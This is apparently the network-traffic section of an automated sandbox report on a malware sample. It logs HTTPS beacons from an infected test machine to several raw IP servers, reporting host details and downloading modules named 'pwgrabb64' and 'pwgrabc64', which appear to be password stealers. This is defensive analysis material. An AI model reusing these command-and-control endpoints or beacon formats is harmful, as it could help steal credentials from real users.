Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
icanhazip.com | 104.18.6.156 | |
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:20 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/W86mMKPIM801nj2bSV6zifCFnf/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:21 GMT
Content-Type: text/plain
Content-Length: 730
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:22 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:23 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/path/C:%5CUsers%5Ctest22%5CAppData%5CLocal%5CTemp%5Ctooltipred.png/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:23 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:24 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 5.152.175.57
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 27 Aug 2021 06:41:29 GMT
Content-Type: application/octet-stream
Content-Length: 771952
Last-Modified: Mon, 23 Aug 2021 15:12:36 GMT
Connection: keep-alive
ETag: "6123bae4-bc770"
Accept-Ranges: bytes
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:53 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:54 GMT
Content-Type: text/plain
Content-Length: 724
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:55 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:56 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 179.189.229.254
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:56 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:41:59 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:00 GMT
Content-Type: text/plain
Content-Length: 724
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:01 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:02 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
403
https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 97.83.40.67
HTTP/1.1 403 Forbidden
Server: nginx/1.14.2
Date: Fri, 27 Aug 2021 06:42:02 GMT
Content-Length: 9
Connection: keep-alive
GET
200
https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/
REQUEST
RESPONSE
BODY
GET /top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: 5.152.175.57
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 27 Aug 2021 06:42:25 GMT
Content-Type: application/octet-stream
Content-Length: 513392
Last-Modified: Mon, 23 Aug 2021 15:12:55 GMT
Connection: keep-alive
ETag: "6123baf7-7d570"
Accept-Ranges: bytes
GET
200
http://icanhazip.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.76.0
Host: icanhazip.com
HTTP/1.1 200 OK
Date: Fri, 27 Aug 2021 06:41:21 GMT
Content-Type: text/plain
Content-Length: 16
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=fb881d842e217bac9a9438b887d50b65fc4e7c13-1630046481-1800-AegPiKfgaRsd0K8PH6L5y70Fya2OVCdZWIRv49SWPmqKCUpEqTei8vp94PBlNuz8QykZ0R/jhtFB7/Uh2/+BYUU=; path=/; expires=Fri, 27-Aug-21 07:11:21 GMT; domain=.icanhazip.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 6853504c5d9112ca-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49168 5.152.175.57:443 | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50 |
TLSv1 192.168.56.102:49166 179.189.229.254:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
TLSv1 192.168.56.102:49171 97.83.40.67:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
Snort Alerts
No Snort Alerts